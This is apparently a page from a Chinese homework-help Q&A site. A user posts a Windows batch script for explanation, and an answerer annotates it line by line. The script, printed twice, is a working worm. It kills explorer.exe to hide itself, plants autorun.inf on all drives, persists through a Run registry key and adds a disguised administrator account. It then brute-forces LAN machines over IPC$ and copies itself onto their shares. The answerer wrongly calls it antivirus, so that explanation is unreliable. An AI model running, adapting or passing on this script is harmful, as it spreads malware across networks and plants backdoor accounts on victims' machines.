英语翻译::我不知道你们怎么对病毒感染如此感冒.::我们是来救人的,不是来害人的.希望不要乱用乱学.setlocal ENABLEDELAYEDEXPANSION::关闭EXPLORER.EXE进程,让用户无法看见运行的BAT::并且利用START最小
来源:学生作业帮助网 编辑:作业帮 时间:2024/11/08 19:49:26
英语翻译::我不知道你们怎么对病毒感染如此感冒.::我们是来救人的,不是来害人的.希望不要乱用乱学.setlocal ENABLEDELAYEDEXPANSION::关闭EXPLORER.EXE进程,让用户无法看见运行的BAT::并且利用START最小
英语翻译
::我不知道你们怎么对病毒感染如此感冒.
::我们是来救人的,不是来害人的.希望不要乱用乱学.
setlocal ENABLEDELAYEDEXPANSION
::关闭EXPLORER.EXE进程,让用户无法看见运行的BAT
::并且利用START最小化BAT
TASKKILL /F /IM EXPLORER.EXE>nul
:newautorun
::建立autorun.inf文件
echo [autorun]>autorun.inf
echo open=%windir%\auto.cmd>>autorun.inf
echo shellexecute=%windir%\auto.cmd>>autorun.inf
echo shell\auto\command=%windir%\auto.cmd>>autorun.inf
echo start for
for %%i in (C D E F G H I J K L M) DO (
COPY /y autorun.inf %%i:\>nul
)
:start
copy /y %0 %windir%\>nul
::启动时启动病毒文件
::其实这里我们还可以把启动名改为ctfmon或IMSCMig输入法的名称,这样
SET REG1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
REG ADD %REG1% /v Script /t REG_SZ /d %windir%\auto.cmd>nul
::建立新的用户
::伪装成一个帮助提供商的用户名SUPPORT_388945_0;
::有的系统不能让用户名为空,或不能密码太简单e
set user1=SUPPORT_388945_0
set pass=admin3389
net user %user1% %pass% /add
net localgroup Administrators %user1% /add
::检查所有活动的机子
rem ###########################
rem 建立密码文件
echo admin3389>hack.txt
echo 123456>>hack.txt
echo admin>>hack.txt
echo 00>>hack.txt
rem ###########################
net view>host.txt
for /f %%a in (host.txt) do (
for /f %%b in (hack.txt) do net use %%a\ipc$ "%%b" /user:administrator
copy /y %windir%\auto.cmd %%a\admin$
copy /y %windir%\autorun.inf %%a\c$
)
::最后再把EXPLORER.EXE进程启动,让用户恢复操作,呵呵
%windir%\explorer.exe
英语翻译::我不知道你们怎么对病毒感染如此感冒.::我们是来救人的,不是来害人的.希望不要乱用乱学.setlocal ENABLEDELAYEDEXPANSION::关闭EXPLORER.EXE进程,让用户无法看见运行的BAT::并且利用START最小
我可能说的不怎么正确!按我知道的说!
::后面的都是注释!不是命令
::我不知道你们怎么对病毒感染如此感冒.
::我们是来救人的,不是来害人的.希望不要乱用乱学.
setlocal ENABLEDELAYEDEXPANSION
设置环境变量
::关闭EXPLORER.EXE进程,让用户无法看见运行的BAT
::并且利用START最小化BAT
TASKKILL /F /IM EXPLORER.EXE>nul
结束EXPLORER.EXE(桌面进程)
:newautorun
标签
::建立autorun.inf文件
echo [autorun]>autorun.inf
echo open=%windir%\auto.cmd>>autorun.inf
echo shellexecute=%windir%\auto.cmd>>autorun.inf
echo shell\auto\command=%windir%\auto.cmd>>autorun.inf
echo start for
for %%i in (C D E F G H I J K L M) DO (
COPY /y autorun.inf %%i:\>nul
)
建一个autorun.inf文件,内容为
[autorun]>autorun.inf
open=%windir%\auto.cmd>>autorun.inf
shellexecute=%windir%\auto.cmd>>autorun.inf
shell\auto\command=%windir%\auto.cmd>>autorun.inf
再复制autorun.inf文件到各个盘符下!(这是防U盘传播毒的)
:start
copy /y %0 %windir%\>nul
复制,自身 到 windows 目录下!
::启动时启动病毒文件
::其实这里我们还可以把启动名改为ctfmon或IMSCMig输入法的名称,这样
SET REG1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
REG ADD %REG1% /v Script /t REG_SZ /d %windir%\auto.cmd>nul
把auto.cmd加入启动项!
::建立新的用户
::伪装成一个帮助提供商的用户名SUPPORT_388945_0;
::有的系统不能让用户名为空,或不能密码太简单e
set user1=SUPPORT_388945_0
set pass=admin3389
net user %user1% %pass% /add
net localgroup Administrators %user1% /add
新建具有管理权限的用户.用户名SUPPORT_388945_0,密码admin3389
::检查所有活动的机子
rem ###########################
rem 建立密码文件
echo admin3389>hack.txt
echo 123456>>hack.txt
echo admin>>hack.txt
echo 00>>hack.txt
建立hack.txt 文档!内容是:
admin3389>hack.txt
123456>>hack.txt
admin>>hack.txt
00>>hack.txt
rem ########################### 注释
net view>host.txt
for /f %%a in (host.txt) do (
for /f %%b in (hack.txt) do net use %%a\ipc$ "%%b" /user:administrator
copy /y %windir%\auto.cmd %%a\admin$
copy /y %windir%\autorun.inf %%a\c$
)
链接,局域网用户!复制auto.cmd,autorun.inf到局域网电脑里!
::最后再把EXPLORER.EXE进程启动,让用户恢复操作,
%windir%\explorer.exe
启动.桌面进程!(看见了桌面!)
总的来说~这是防毒
我的水平.也就能解释这么多了!